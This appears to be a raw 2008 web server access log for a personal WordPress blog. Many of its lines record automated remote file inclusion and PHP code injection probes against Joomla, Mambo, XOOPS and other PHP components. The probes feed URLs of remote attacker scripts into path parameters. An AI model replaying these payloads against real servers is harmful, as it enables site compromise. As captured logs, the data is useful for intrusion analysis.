66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /personalheader.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/themes/default/images/personalheader.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /img_1120.JPG HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /img_1133.JPG HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 65536 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 65536 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /img_1130.JPG HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /img_1131.JPG HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.JPG HTTP/1.1" 200 115446 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /img_1132.JPG HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /img_1135.JPG HTTP/1.1" 404 275 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:56 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 131072 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
211.239.157.171 - - [19/May/2008:09:52:00 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:52:00 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:52:32 -0700] "GET /logs//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:52:33 -0700] "GET //zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:09:53:00 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:53:05 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:53:05 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:36 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:36 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:36 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:36 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:36 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:36 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:37 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:37 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:53:37 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.123 - - [19/May/2008:09:53:46 -0700] "GET /logs/access_071016.log HTTP/1.0" 200 46965 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:53:56 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:54:00 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:54:01 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:54:01 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:09:54:07 -0700] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:54:10 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:54:13 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:54:14 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:54:19 -0700] "GET /logs/access_080219.log//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:54:21 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:54:23 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:54:26 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.55.211.26 - - [19/May/2008:09:54:29 -0700] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:54:35 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:54:35 -0700] "GET /logs/access_080207.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:54:35 -0700] "GET /logs/access_080207.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:09:54:43 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://dalnethackerZREG.fileave.com/id-zreg.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:09:54:46 -0700] "GET //errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:09:54:46 -0700] "GET /logs//errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:54:59 -0700] "GET /logs/access_080207.log//modules/4nAlbum/public/displayCategory.php?basepath=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:55:00 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:55:03 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:55:03 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:55:06 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:55:15 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:55:15 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:55:16 -0700] "GET /logs/access_080207.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:55:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:55:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:55:33 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:55:54 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:56:07 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.164 - - [19/May/2008:09:56:19 -0700] "GET /tmp/sess_9e54e4a734554eb1c1acfe81e2718864 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
98.173.1.8 - - [19/May/2008:09:56:46 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.173.1.8 - - [19/May/2008:09:56:46 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:09:56:52 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:09:56:53 -0700] "GET /logs/access_080326.log/common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:09:56:54 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:09:56:54 -0700] "GET /common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:09:56:56 -0700] "GET /logs/common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:09:57:21 -0700] "GET /index.php?page=http://electrometro.com.ve/wall/xpl/safe.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:57:29 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:09:57:29 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:09:57:29 -0700] "GET //include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:09:57:29 -0700] "GET /logs//include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:57:30 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:57:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:09:57:43 -0700] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:09:57:50 -0700] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.114.200 - - [19/May/2008:09:57:58 -0700] "GET /logs/access_080226.log HTTP/1.1" 206 837966 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:58:16 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:58:16 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:09:58:19 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:09:58:19 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:58:40 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:58:41 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:58:42 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:58:45 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:58:46 -0700] "GET //appserv/main.php?appserv_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:58:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:09:58:55 -0700] "GET //roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:09:58:56 -0700] "GET //roster//addons/guildbank/searcharrays.php?addonDir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.175.25 - - [19/May/2008:09:59:01 -0700] "GET /logs/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.25 - - [19/May/2008:09:59:02 -0700] "GET /errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:09:59:05 -0700] "GET /logs/access_080325.log/common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:59:14 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:59:14 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:09:59:19 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:09:59:20 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:09:59:20 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:59:23 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:59:23 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:59:24 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:59:24 -0700] "GET //index.php?option=com_custompages&cpage=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:59:31 -0700] "GET /logs/access.log/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:59:36 -0700] "GET /logs/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:59:42 -0700] "GET /index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
